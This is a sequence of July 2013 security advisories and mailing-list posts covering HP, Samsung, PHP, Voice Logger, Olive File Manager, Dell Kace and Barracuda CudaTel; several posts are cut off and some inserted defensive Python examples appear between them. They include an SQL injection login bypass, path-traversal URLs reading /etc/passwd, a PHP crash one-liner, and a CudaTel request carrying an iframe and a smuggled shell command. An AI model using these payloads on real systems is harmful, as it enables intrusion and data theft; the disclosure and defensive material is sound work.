[security bulletin] HPSBGN02882 rev.1 - HP Database and Middleware Automation (DMA) using SSL, Remote Disclosure of Information
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03788014

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03788014
Version: 1

HPSBGN02882 rev.1 - HP Database and Middleware Automation (DMA) using SSL, Remote Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2013-07-16
Last Updated: 2013-07-16

Potential Security Impact: Remote disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Database and Middleware Automation (DMA) using SSL (Secure Sockets Layer). The vulnerability could be remotely exploited resulting in disclosure of information.

References: CVE-2013-2365 (SSRT101215)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Database and Middleware Automation (DMA) v10.0 and v10.01.

BACKGROUND

CVSS 2.0 Base Metrics
  Reference        Base Vector                      Base Score
  CVE-2013-2365    (AV:A/AC:M/Au:N/C:C/I:C/A:C)     7.9
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION
HP has made the following software update available to resolve the vulnerability.

HP Database and Middleware Automation (DMA) v10.10 or subsequent, available from HP Live Network and HP Software Support Online.

DMA v10.10 allows configuration of the SSL (Secure Sockets Layer) based communication between the DMA client and the DMA server. Customers need to upgrade to DMA v10.10 following the installation documentation included with the DMA v10.10 software update. Please refer to the DMA v10.10 Release Notes for detailed upgrade instructions.
HISTORY
Version:1 (rev.1) - 16 July 2013 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
[security bulletin] HPSBMU02870 SSRT101012 rev.2 - HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03747342

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03747342
Version: 2

HPSBMU02870 SSRT101012 rev.2 - HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2013-07-10
Last Updated: 2013-07-16

Potential Security Impact: Remote unauthorized access.
Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Network Node Manager I (NNMi) on HP-UX, Linux, Solaris, and Windows. The vulnerability could be remotely exploited resulting in unauthorized access.

References: CVE-2013-2351 (SSRT101012, ZDI-CAN-1566)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Network Node Manager I (NNMi) v9.00, v9.1X and v9.2X for HP-UX, Linux, Solaris, and Windows.

BACKGROUND

CVSS 2.0 Base Metrics
  Reference        Base Vector                      Base Score
  CVE-2013-2351    (AV:N/AC:L/Au:N/C:P/I:P/A:P)     7.5
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks e6af8de8b1d4b2b6d5ba2610cbf9cd38 for working with HP's Zero Day Initiative, which reported these vulnerabilities to security-al...@hp.com.

RESOLUTION
HP has made patches and hotfixes available to resolve this vulnerability for NNMi v9.00, v9.1X, and v9.2X. For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel.

NNMi Version   Platform   Required Patch Level   Hotfix
9.00           Linux      NNM900L_5              HF-NNMI-9.0XP5-NNMCONTENT-20130612
               Solaris    NNM900S_5
               Windows    NNM900W_5
               HP-UX      PHSS_42328 (Note: See Product Specific Information below.)
9.10           Linux      NNM910L_5              HF-NNMI-9.1XP5-NNMCONTENT-20130417
               Solaris    NNM910S_5
               Windows    NNM910W_5
               HP-UX      PHSS_43078 (Note: See Product Specific Information below.)
9.2X           Linux      NNM920L_3
               Solaris    NNM920S_3
               Windows    NNM920W_3
               HP-UX      PHSS_43408 (Note: See Product Specific Information below.)

Note: The hotfix must be installed after the required patch. The hotfix must be reinstalled if the required patch is reinstalled.

MANUAL ACTIONS: Yes - NonUpdate
Install the applicable patch and hotfix.

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

For HP-UX NNMi v9.2X
HP-UX B.11.31
HPOvNNM.HPOVNMSAS HPOvNnmSiteScope.HPOVNNMSITESCOPE HPOvNNM.HPNNMTRAPSV HPOvNNM.HPOVNNMNA HPOvNNM.HPOVNNMINSTALL HPOvNNM.HPOVNNMAS HPOvNNM.HPOVNMSCUSTCORR HPOvNNM.HPOVNNMUI HPOvNNM.HPNMSCLUSTER HPOvNNM.HPOVNMSSNMPCO HPOvNNM.HPNMSCOMPS HPOvNNM.HPOVNMSHA HPOvNNM.HPOVSNMP HPOvNNM.HPOVNMSCAUSESV HPOvNNM.HPOVSTPLR HPOvNNM.HPOVNNMSIM HPOvNNM.HPOVNNMNC HPOvNNM.HPNMSCUSTPOLL HPOvNNM.HPOVNNMCISCO HPOvNNM.HPOVNNMNB HPOvNNM.HPOVNNMOM HPOvNNM.HPOVNNMUCMDB HPOvNNM.HPOVNMSSPMD HPOvNNM.HPOVPERFSPIADA HPOvNNM.HPOVNMSLIC HPOvNnmRams.HPOVNNMRAMS HPOvNNM.HPOVNMSSPICOM HPOvNNM.HPNMSDEVEXTN HPOvNNM.HPOVNMSEVTPSV HPOvNNM.HPOVNNMBSM HPOvNNM.HPOVNMSDISCOSV HPOvNNM.HPOVNMSRBA HPOvNNM.HPOVNMSASSHARED HPOvNNM.HPOVNMSCONFIG HPOvNNM.HPOVNNMGEN HPOvNNM.HPOVNMSCOMMON
action: install patch PHSS_43408 or subsequent

For HP-UX NNMi v9.1X
HP-UX B.11.31
HPOvNNM.HPOVNMSCAUSESV HPOvNNM.HPOVNMSDISCOSV HPOvNNM.HPOVICMP HPOvNNM.HPOVNMSCONFIG HPOvNNM.HPOVNNMCISCO HPOvNNM.HPOVNNMOM HPOvNNM.HPNMSCLUSTER
HPOvNNM.HPOVNMSEMBDDB HPOvNNM.HPNMSDEVEXTN HPOvNNM.HPOVNNMBSM HPOvNNM.HPNNMTRAPSV HPOvNNM.HPOVNMSHA HPOvNnmSiteScope.HPOVNNMSITESCOPE HPOvNNM.HPOVNMSEVTPSV HPOvNNM.HPOVSTPLR HPOvNNM.HPOVNMSCUSTCORR HPOvNNM.HPOVNMSISPINET HPOvNNM.HPNMSCOMPS HPOvNNM.HPOVNNMINSTALL HPOvNNM.HPOVNMSSNMPCO HPOvNNM.HPNMSJBOSS HPOvNNM.HPOVNMSSPMD HPOvNNM.HPOVNNMNC HPOvNNM.HPOVNNMNA HPOvNNM.HPOVNMSLIC HPOvNNM.HPOVNNMSIM HPOvNNM.HPOVNNMNB HPOvNNM.HPOVNNMUCMDB HPOvNNM.HPOVNMSSPICOM HPOvNNM.HPOVSNMP HPOvNNM.HPOVNNMBAC HPOvNnmRams.HPOVNNMRAMS HPOvNNM.HPOVNMSCOMMON HPOvNNM.HPOVNNMGEN HPOvNNM.HPOVNNMUI HPOvNNM.HPOVNMSRBA HPOvNNM.HPOVPERFSPIADA HPOvNNM.HPNMSCUSTPOLL
action: install patch PHSS_43078 or subsequent

For HP-UX NNMi v9.00
HP-UX B.11.31
HPOvNNM.HPOVICMP HPOvNNM.HPOVNNMBSM HPOvNNM.HPOVNMSCUSTCORR HPOvNNM.
Voice Logger astTECS - bypass login & arbitrary file download
Author: Michal Blaszczak
Website: http://blaszczakm.blogspot.com
Project: hack voip - http://blaszczakm.blogspot.com/search/label/hack%20voip
Date: 16.07.2013

Voice Logger - VoIP software for Call Center

1) bypass login
login: admin' or 1='1
password: admin
line: 168
file: manager_login.server.php

2) arbitrary file download
http://192.168.15.145/poligon/asttecs/records1.php?file=/etc/passwd
line: 2
file: records.php

http://192.168.15.145/poligon/asttecs/records.php?file=/etc/passwd
line: 2
file: records.php

3) and other security bugs

Michał Błaszczak
http://blaszczakm.blogspot.com
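The two bugs above, shown as an added example in Python (not code from the advisory or from the Voice Logger product): a login query built by string concatenation beside one using bound parameters, and a file parameter resolved against the recordings directory instead of being opened as given. The SQLite table, the recordings directory and all function names are constructed for this illustration.

```python
"""Added example (not from the advisory or the Voice Logger product): the two
defect classes reported above, each beside a hardened form. The users table,
the recordings directory and every function name are constructed for this
illustration; passwords are stored in clear only to keep the demo short."""
import os
import sqlite3
import tempfile


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, login: str, password: str) -> bool:
    # The submitted login closes the quoted literal. With  admin' or 1='1  the
    # WHERE clause becomes  login = 'admin' or 1='1' AND password = '...'  and
    # the OR branch matches the admin row whatever the password is.
    sql = "SELECT 1 FROM users WHERE login = '%s' AND password = '%s'" % (login, password)
    return conn.execute(sql).fetchone() is not None


def login_hardened(conn, login: str, password: str) -> bool:
    # Bound parameters travel separately from the SQL text, so quotes in the
    # input are compared as data and never change the query structure.
    sql = "SELECT 1 FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (login, password)).fetchone() is not None


def resolve_recording(base_dir: str, file_param: str):
    """Map a request's file parameter to an existing file inside base_dir, else None.

    Opening file_param as given is the records.php defect: os.path.join drops
    base_dir entirely when the parameter is absolute (?file=/etc/passwd), and
    ../ or symlinks walk out of it. realpath collapses both before the check."""
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, file_param))
    try:
        contained = candidate != root and os.path.commonpath([root, candidate]) == root
    except ValueError:          # different drives on Windows: never contained
        contained = False
    return candidate if contained and os.path.isfile(candidate) else None


def demo() -> dict:
    """Exercise both checks with the advisory's inputs; returns the outcomes."""
    conn = make_db()
    results = {
        "vuln_bypass": login_vulnerable(conn, "admin' or 1='1", "admin"),
        "hard_bypass": login_hardened(conn, "admin' or 1='1", "admin"),
        "hard_valid": login_hardened(conn, "admin", "correct-horse"),
    }
    with tempfile.TemporaryDirectory() as rec_dir:
        wanted = os.path.join(rec_dir, "call-0001.wav")
        with open(wanted, "wb") as fh:
            fh.write(b"RIFF")   # constructed placeholder for a call recording
        results["inside"] = resolve_recording(rec_dir, "call-0001.wav") == os.path.realpath(wanted)
        results["absolute"] = resolve_recording(rec_dir, "/etc/passwd")
        results["traversal"] = resolve_recording(rec_dir, "../../etc/passwd")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-10s %r" % (key, value))
```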
[CVE-2013-4763|CVE-2013-4764] Vulnerability in built-in system app of Samsung Galaxy S3/S4
Hi list,

I would like to inform you that the details of the vulnerability in a built-in system app of Samsung Galaxy S3/S4 (assigned CVE-2013-4763 and CVE-2013-4764) are now disclosed to the public.

In Samsung Galaxy S3/S4, a pre-loaded app, i.e., sCloudBackupProvider.apk, is used to provide backup functionality for the users, and it unintentionally exposes several unprotected components. By exploiting these unprotected components, an unprivileged app can trigger a so-called "restore" operation to write SMS messages back to the standard SMS database file (mmssms.db) used by the system messaging app, i.e., SecMms.apk. As a result, a smishing attack can effectively create and inject arbitrary (fake) SMS text messages. Similarly, fake MMS messages and call logs are also possible. This vulnerability has been disclosed in CVE-2013-4763.

Also, these components can be sequentially triggered in a specific order to create arbitrary SMS content, inject it into the system-wide SMS database, and then trigger the built-in SMS-sending behavior (to an arbitrary destination). This vulnerability has been disclosed in CVE-2013-4764.

QIHU Inc. discovered these vulnerabilities and informed Samsung Corp. on June 10, 2013. Samsung confirmed the vulnerability and is now preparing an OTA update. As a temporary workaround, disabling the sCloudBackupProvider.apk app would help block known attack vectors.

Details of CVE-2013-4763 and CVE-2013-4764 can also be found on QIHU Inc.'s official site:
http://shouji.360.cn/securityReportlist/CVE-2013-4763.html
http://shouji.360.cn/securityReportlist/CVE-2013-4764.html

Regards,
Z.X. from QIHU Inc.
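The unprotected-component pattern described above, as an added example that is not part of the disclosure or of any Samsung code: a small audit that applies the Android defaults for android:exported to a manifest and reports components any other app can reach without holding a permission. The manifest, package and component names are constructed.

```python
"""Added example, not part of the QIHU disclosure or of any Samsung code.
Audits an AndroidManifest.xml for components that other apps can invoke
without holding any permission, the condition behind the sCloudBackupProvider
report above. The manifest below is constructed and its names are hypothetical."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")


def _attr(elem, name):
    """Read an android:* attribute; ElementTree keys them by namespace URI."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(elem, target_sdk: int) -> bool:
    """Platform defaults for android:exported when the attribute is absent."""
    explicit = _attr(elem, "exported")
    if explicit is not None:
        return explicit == "true"
    if elem.tag == "provider":
        return target_sdk < 17      # providers default to exported before API 17
    return elem.find("intent-filter") is not None   # others: exported if filtered


def audit_manifest(manifest_xml: str):
    """Return [(tag, name, problem)] for every exported, permission-less component.

    Only the presence of a permission is checked; whether it really restricts
    callers depends on its protectionLevel (signature is what a vendor app
    should use), which lives in the <permission> declaration, not here."""
    root = ET.fromstring(manifest_xml)
    uses_sdk = root.find("uses-sdk")
    target_sdk = 1
    if uses_sdk is not None and _attr(uses_sdk, "targetSdkVersion"):
        target_sdk = int(_attr(uses_sdk, "targetSdkVersion"))
    findings = []
    for comp in root.iter():
        if comp.tag not in COMPONENT_TAGS or not is_exported(comp, target_sdk):
            continue
        guarded = _attr(comp, "permission")
        if comp.tag == "provider" and not guarded:
            # A provider is covered only if both directions carry a permission.
            guarded = _attr(comp, "readPermission") and _attr(comp, "writePermission")
        if not guarded:
            findings.append((comp.tag, _attr(comp, "name"), "exported without android:permission"))
    return findings


SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.backupprovider">
  <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="16"/>
  <application>
    <provider android:name=".BackupProvider"
              android:authorities="com.example.backupprovider"/>
    <receiver android:name=".RestoreReceiver">
      <intent-filter>
        <action android:name="com.example.action.RESTORE"/>
      </intent-filter>
    </receiver>
    <service android:name=".RestoreService" android:exported="true"
             android:permission="com.example.permission.BACKUP"/>
    <activity android:name=".SettingsActivity" android:exported="false"/>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for tag, name, problem in audit_manifest(SAMPLE_MANIFEST):
        print("%-8s %-20s %s" % (tag, name, problem))
```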
Re: [ MDVSA-2013:195 ] php
Hey guys,

Related to this I've found a proof of concept test script:

php -r 'xml_parse_into_struct(xml_parser_create_ns(), str_repeat("", 1000), $b);'

Gabe
twitter: @gmaggiotti

On Mon, Jul 15, 2013 at 3:41 AM, wrote:
>
> ___
>
> Mandriva Linux Security Advisory MDVSA-2013:195
> http://www.mandriva.com/en/support/security/
> ___
>
> Package : php
> Date: July 12, 2013
> Affected: Business Server 1.0, Enterprise Server 5.0
> ___
>
> Problem Description:
>
> A vulnerability has been discovered and corrected in php:
>
> * Fixed PHP bug #65236 (heap corruption in xml parser) (CVE-2013-4113).
>
> The updated packages have been upgraded to the 5.3.27 version which
> is not vulnerable to this issue.
>
> The php-timezonedb package has been updated to the 2013.4 version.
>
> Additionally, some packages which require so have been rebuilt for
> php-5.3.27.
> ___
>
> References:
>
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4113
> http://www.php.net/ChangeLog-5.php#5.3.27
> ___
>
> Updated Packages:
>
> Mandriva Enterprise Server 5:
Olive File Manager v1.0.1 iOS - Multiple Vulnerabilities
Title:
Olive File Manager v1.0.1 iOS - Multiple Vulnerabilities

Date:
2013-07-13

References:
http://www.vulnerability-lab.com/get_content.php?id=1009

VL-ID:
1009

Common Vulnerability Scoring System:
5.6

Introduction:
A powerful file manager and well-designed office suite. Multiple features all in one app, coming with new functions every 2 weeks! These are all in Olive File Manager! Once you have it, ask for nothing else!

Powerful file manager: Retain your use habits with PC file manager such as copy and paste. Capable of opening documents like mail attachments from other apps. Support for multiple display modes (e.g. list, thumbnail, grid), sending documents as mail attachments, screening display, sorting and searching documents, etc.
A wireless USB flash disk
A compressing & decompressing tool
An encrypted safe box
An e-book reader
A GoogleDocs terminal
A Dropbox terminal
A picture viewer
A music player
A video player

Office Suite: Multiple formats supported, including doc, docs, xls, xlsx, ppt, pptx, pdf, txt, rtf, html, iwork, etc.
Wireless USB flash disk: This enables you to transfer your files from your USB disk to your iPad through WIFI.
Compressing & decompressing: Support for decompression and package compression for .zip and .rar files.
Encrypted safe box: You can set a password on your Olive File Manager and never need to worry about your documents being exposed when someone is playing with your iPad.
Cloud: GoogleDocs and Dropbox support is available with the function of synchronous upload and download of files (more Cloud support is under development).
Picture Viewer: Support for common image formats such as .png, .bmp and .jpg.
Music & Video Player: Support for common video formats including MP3, AAC, 3GP, avi, au, wav, MP4, mov and m4a

(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/olive-file-manager/id529493702 )

Abstract:
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the Olive File Manager v1.0.1 application (Apple iOS - iPad & iPhone).

Report-Timeline:
2013-07-13: Public Disclosure (Vulnerability Laboratory)

Status:
Published

Affected Products:
Apple AppStore
Product: Olive File Manager Wifi 1.0.1

Exploitation-Technique:
Remote

Severity:
High

Details:
1.1
A local file include and arbitrary file upload web vulnerability is detected in the Olive File Manager v1.0.1 application (Apple iOS - iPad & iPhone). The vulnerability allows remote attackers to upload files via POST method with multiple extensions and gain unauthorized access to them on the application side of the service.

The vulnerability is located in the file upload/add module of the web-server (http://localhost:8797/) when processing a request with a manipulated filename via POST. The injected file will be accessible via the index listing module of the web application. Remote attackers can exchange the filename with a double or triple extension via POST method to bypass the upload validation and filter process. After the upload the attacker accesses the file with one extension and exchanges it with the other one to execute for example php code.

A persistent script code injection is detected in the filename parameter. Attackers can tamper with the request and exchange the file name with persistent malicious script code or tags. The code will be executed in the main index site when processing to list the object (file) items. Attackers are also able to inject persistent code with local frame requests to gain unauthorized access to application data/apps or restricted application information.

The execution of the persistent code also occurs when an application user is processing to refresh, update or delete the malicious web context. Exploitation of the vulnerability requires no user interaction and also no privileged application user account (no password standard). Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload.

Vulnerable Application(s):
[+] Olive File Manager v1.0.1 - iTunes or AppStore (Apple)

Vulnerable Module(s):
[+] File Upload (Web Server) [Remote]

Vulnerable File(s):
[+] AirDriveAction_file_add

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Application Index File Listing (http://localhost:8797/)

1.2
A persistent input validation web vulnerability is detected in the Olive File Manager v1.0.1 application (Apple iOS - iPad & iPhone). The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the app.

The vulnerability is loc
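An added example (not code from the advisory or from the Olive File Manager app) of the upload-side check that closes the double/triple extension bypass described in 1.1: the client-supplied filename is reduced to one stem plus one allowlisted extension, and the on-disk name is chosen by the server. The allowlist and the function names are assumptions made for this illustration.

```python
"""Added example, not from the advisory or the Olive File Manager app: a
filename policy for an upload handler that refuses the double/triple-extension
names described above. Function names and the extension allowlist are
constructed for this illustration."""
import os
import re
import uuid

ALLOWED_EXTENSIONS = {"pdf", "txt", "png", "jpg", "zip"}   # constructed allowlist
STEM_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def check_upload_name(filename: str):
    """Return (accepted, reason) for a client-supplied filename.

    The name must be a bare basename with exactly one dot, an allowlisted
    extension and a stem of safe characters, so shell.php.png, .htaccess,
    ../x.png and <img src=x>.png are all refused. Because a name is rejected
    rather than 'cleaned', there is no second extension left to swap to later."""
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename:
        return False, "path separators are not allowed"
    parts = base.split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False, "exactly one extension is required"
    if parts[1].lower() not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed"
    if not STEM_RE.fullmatch(parts[0]):
        return False, "stem may only contain [A-Za-z0-9_-]"
    return True, "ok"


def stored_name(filename: str) -> str:
    """Server-chosen on-disk name: random stem plus the validated extension.

    A later rename request must pass check_upload_name as well, so a stored
    file can never acquire a suffix outside the allowlist; serving uploads
    from a directory with script execution disabled is the matching server
    setting, which is outside what this function can enforce."""
    accepted, reason = check_upload_name(filename)
    if not accepted:
        raise ValueError(reason)
    return "%s.%s" % (uuid.uuid4().hex, filename.rsplit(".", 1)[1].lower())


if __name__ == "__main__":
    for candidate in ("report.pdf", "shell.php.png", "shell.php", "../x.png",
                      ".htaccess", "<img src=x>.png", "Report_2013.PNG"):
        print("%-18s %s" % (candidate, check_upload_name(candidate)))
```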
Dell Kace 1000 SMA v5.4.70402 - Persistent Vulnerabilities
Title:
Dell Kace 1000 SMA v5.4.70402 - Persistent Vulnerabilities

Date:
2013-07-16

References:
http://www.vulnerability-lab.com/get_content.php?id=833

VL-ID:
833

Common Vulnerability Scoring System:
3.5

Introduction:
Dell KACE is to provide an appliance-based approach to systems management, to create time for systems administration professionals, while saving money for their companies. Dell KACE Systems Management Appliances are available as both physical and virtual appliances. The KACE Management Appliance delivers a fully integrated systems management solution, unlike traditional software approaches that can require complex and time-consuming deployment and maintenance. KACE accomplishes this via an extremely flexible, intelligent appliance-based architecture that typically deploys in days and is self maintaining. The KACE Management Appliance also provides direct access to time-saving ITNinja systems management community information using AppDeploy Live, the leading destination for end point administrators. The result: Comprehensive systems management that is easy-to-use and that can be more economical than software only alternatives. Read more in the white paper KACE K1000 Management Appliance Architecture: Harnessing the Power of an Appliance-based Architecture. The KACE Management Appliance is designed for enterprises and business units with up to 20,000 nodes.

(Copy of the Vendor Homepage: http://www.kace.com/products/systems-management-appliance )

Abstract:
The Vulnerability Laboratory Research Team discovered a web session vulnerability in Dell Kace K1000, Systems Management Appliance.
Report-Timeline:
2013-01-24: Researcher Notification & Coordination
2013-02-06: Vendor Notification
2013-02-08: Vendor Response/Feedback
2013-**-**: Vendor Fix/Patch
2013-07-16: Public Disclosure

Status:
Published

Affected Products:
DELL
Product: Kace K1000 SMA 5.4.70402

Exploitation-Technique:
Remote

Severity:
Medium

Details:
Multiple persistent input validation web vulnerabilities are detected in Dell Kace K1000, Systems Management Appliance. The vulnerability allows an attacker to inject own malicious script code in the vulnerable module on the application side (persistent).

The first vulnerability is located in the `Inventory` module with the bound vulnerable Ip-address, Mac, Os Name, Service pack, Notes and Label Name parameters. The persistent injected script code will be executed directly out of the `Computer` listing when processing to manage the earlier inserted machines in dbms context.

The second vulnerability is located in the `Distribution` module with the bound vulnerable Machine Name and Mac address parameters. The persistent injected script code will be executed directly out of the `Wake-on-lan` exception handling mechanism when malicious data is inserted in the vulnerable fields.

Successful exploitation of the vulnerabilities results in persistent session hijacking, persistent phishing, persistent external redirects, persistent external malware loads via inject and persistent vulnerable module web context manipulation.

Vulnerable Section(s):
[+] Inventory => Computers
[+] Inventory => Computers
[+] Distribution => Wake-on-lan

Vulnerable Module(s):
[+] Add New Item
[+] Add Label
[+] Add new Item

Vulnerable Parameter(s):
[+] [Ip-address] [Mac] [Os Name] [Service pack] [Notes]
[+] [Label Name]
[+] [Machine Name] [Mac address]

Affected Module(s):
[+] Inventory => Computers
[+] Inventory => Computers => Choose Action Menu => Apply label
[+] Distribution => Wake-on-lan => Exception handling

Proof of Concept:
The vulnerability can be exploited by remote attackers with low user interaction and low privilege application user account. For demonstration or reproduce ...

1.1
URL: https://pub23.127.0.0.1:1336/adminui/machine.php?ID=1
Affected Module: Inventory => Computers

Code Review:

// this will get set at the end of the page, after we've generated all the dynamic sections
var gLastSectionId = 0;

[Expand All] [Printer Friendly Version] [Show All History]
Summary
Name: Name
Manual Entry: Manually Entered Record, no communication with the server [Edit]
IP Address: [PERSISTENT INJECTED SCRIPT CODE!] Action...Action 1
MAC: [PERSISTENT INJECTED SCRIPT C
Barracuda CudaTel 2.6.02.040 - Client Side Cross Site Scripting Vulnerability
Title:
Barracuda CudaTel 2.6.02.040 - Client Side Cross Site Scripting Vulnerability

Date:
2013-07-15

References:
http://www.vulnerability-lab.com/get_content.php?id=776
BARRACUDA NETWORK SECURITY ID: BNSEC-807

VL-ID:
776

Common Vulnerability Scoring System:
2.1

Introduction:
Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, affordable, next-generation phone system for businesses. CudaTel Communication Server's enterprise-class feature set includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use Web interface. CudaTel Communication Server is compatible with any SIP device and provider, and can be pre-configured for use with both analog and digital telephone networks.

Powerful, Complete Solution
With an expansive feature set and no per user or phone licensing fees, the CudaTel Communication Server is equipped and priced for organizations of any size. Native High Definition audio support and integrated phone line (TDM) hardware produces an unparalleled audio experience. VOIP encryption protects calls from hackers and digital eavesdroppers.

(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )

Abstract:
The Vulnerability Laboratory Research Team discovered a client side web vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.

Report-Timeline:
2012-11-26: Researcher Notification & Coordination
2012-11-27: Vendor Notification
2012-12-01: Vendor Response/Feedback
2013-04-03: Vendor Fix/Patch
2012-07-15: Public Disclosure

Status:
Published

Affected Products:
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040

Exploitation-Technique:
Remote

Severity:
Medium

Details:
A client side input validation vulnerability is detected in Barracuda Networks CudaTel v2.6.002.040 appliance application.
The non-persistent vulnerability allows remote attackers to manipulate website links to provoke malicious client side (application-side) requests.

The second vulnerability (client side) is located in the `error:Internal Error` exception handling. When remote attackers provoke to load an invalid request the exception-handling will display the earlier inserted bbx_hostname (malicious) web context (exp. script codes). The attacker can use the vulnerable bbx_backup_site_host parameter of the test connection listing module to provoke an evil application exception-handling request.

Successful exploitation of the vulnerability results in client side phishing, client side session hijacking and client side external redirects to malware or evil websites. Exploitation of the vulnerability requires medium application user interaction.

Vulnerable Section(s):
[+] Test - Connection

Vulnerable Module(s):
[+] Exception-handling [Internal Error] - Listing

Vulnerable Parameter(s):
[+] bbx_backup_site_host

Proof of Concept:
The vulnerability can be exploited by remote attackers with low or medium required user interaction and without privileged application user account. For demonstration or reproduce ...

Review: Exception-handling [Internal Error] - Listing [bbx_backup_site_host]

---
error: "Internal error.\n[backup] Can't connect to >\"http://vuln-lab.com/?content-type=text/html";>http://vuln-lab.com>"
---

PoC:
http://cudatel.ptest.cudasvc.com/gui/backup/test?_=1353975862209&bbx_backup_site_id=2&bbx_backup_site_type=ftp
&bbx_backup_site_host=%3E%22%3Ciframe%20src=http://vulnerability-lab.com%3E&bbx_backup_site_port=8&bbx_backup_site_user=BENJAMINKM
&bbx_backup_site_path=%2F+%26+echo+%3E+%2Fdata%2Fsounds%2Fmusic%2F8%2F2a10577f-6764-4368-8571-44d42e4695ff

Solution:
The vulnerability can be patched by parsing the vulnerable bbx_backup_site_host parameter request. Parse the internal error exception-handling when processing to display the error string of the requested parameter. (error context)

2013-04-03: Vendor Fix/Patch
Note: Barracuda Networks provided a download in the customer section but also an automatic update to patch the issue in the appliance series.

Risk:
The security risk of the client side input validation vulnerability is estimated as medium(-) because of the main location in the exception-handling.

Credits:
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)

Disclaimer:
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merch
FTP Sprite v1.2.1 iOS - Persistent Web Vulnerability
Title:
FTP Sprite v1.2.1 iOS - Persistent Web Vulnerability

Date:
2013-07-12

References:
http://www.vulnerability-lab.com/get_content.php?id=1007

VL-ID:
1007

Common Vulnerability Scoring System:
3.7

Introduction:
FTP Sprite can turn your iPhone, ipad, ipod into ftp client, download files from ftp server and upload files into ftp server.

** FTP Action **
** Add, modify, delete ftp server
** Download multiple files/folder Supported
** Upload multiple files/folder Supported
** Living progress
** View files online
** Create folder online
** Download and upload history
** Sorting by file name, create date and file size
** Local File Sharing **
** USB File Sharing via iTunes
